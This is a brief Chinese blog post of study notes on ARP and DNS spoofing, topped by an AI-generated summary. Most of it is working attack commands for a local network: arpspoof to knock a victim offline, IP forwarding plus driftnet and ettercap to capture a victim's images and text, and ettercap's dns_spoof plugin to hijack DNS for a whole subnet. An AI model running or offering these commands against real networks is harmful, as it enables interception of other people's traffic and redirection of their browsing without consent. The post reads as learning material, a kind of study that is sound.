0x08网络基础_ARP欺骗_DNS欺骗

子怡 发布于 2023-06-25 283 次阅读

AI 摘要

ARP(地址解析协议)是一种根据IP地址获取物理地址的协议。常用命令包括arp -a和arp -g。ARP断网是针对局域网内的攻击技术,比如arpspoof -i eth0 -t 受害者IP 网关。ARP欺骗可以通过设置流量转发和使用工具如driftnet -i eth0和ettercap -Tq -i eth0在内网截获图片和文本。在DNS方面,ettercap可以修改DNS文件(vim /etc/ettercap/ether.dns)并开启图形化界面(ettercap -G),甚至可以劫持整个网段(ettercap –T –q –i eth0 –P dns_spoof)实施攻击。

网络基础

ARP

地址解析协议

  • 根据IP地址获取物理地址

常用命令

  • arp -a
  • arp -g

ARP断网

  • 针对统一局域网内的攻击技术
  • arpspoof -i eth0 -t 受害者IP 网关

ARP欺骗

  • 设置流量转发

    • echo 1 >/proc/sys/net/ipv4/ip_ forward

  • 内网截获图片

    • driftnet -i eth0

  • 截获文本

    • ettercap -Tq -i eth0

DNS

ettercap

  • 修改DNS文件

    • vim /etc/ettercap/ether.dns

  • 开启图形化界面

    • ettercap -G

  • 开启ettercap劫持整个网段

    • ettercap –T –q –i eth0 –P dns_spoof ////

      • -T 使用基于文本界面
      • -q 启动安静模式(不回显的意思)
      • -i 指定网卡
      • -P 使用插件,这里我们使用的是dns_spoof
此作者没有提供个人介绍
最后更新于 2024-03-30